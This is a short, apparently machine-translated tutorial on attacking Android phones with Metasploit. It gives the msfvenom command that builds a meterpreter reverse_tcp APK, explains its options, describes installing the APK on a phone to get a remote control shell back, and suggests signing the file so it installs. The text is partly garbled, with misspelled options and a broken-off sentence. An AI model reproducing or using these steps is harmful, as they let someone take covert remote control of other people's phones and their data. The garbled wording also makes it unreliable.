First I build an Android app under Kali, that is, the APK format file, the command used is:
Msfvenom-p android/meterpreter/reverse_tcp lhost= Local IP lport= listening port R >/root/rb.apk
Note:-P: Refers to the payload used in this environment, the payload is the successful Android attack after the rebound connection sent to the attacker's terminal;
Lhoost and Lport refer to the local bounce IP address and the local listening port;
-r: Indicates the type of file to be generated;
>/root/rb.apk: Indicates the save path of the generated file;
Then the next step is to configure:
After the attack is successfully configured on the phone, the previous generated apk file is imported into the phone, and then the supply side starts to exploit, you can see the connection status of the reply:
Selecting a connection session and entering the control shell allows you to view the content information and version information:
Note: An error may occur when you import the APK file generated in Kali directly into the phone, because the APK file is not authorized, so we download a signed software to authorize the file, then you can import the "
Attacking Android with Metasploit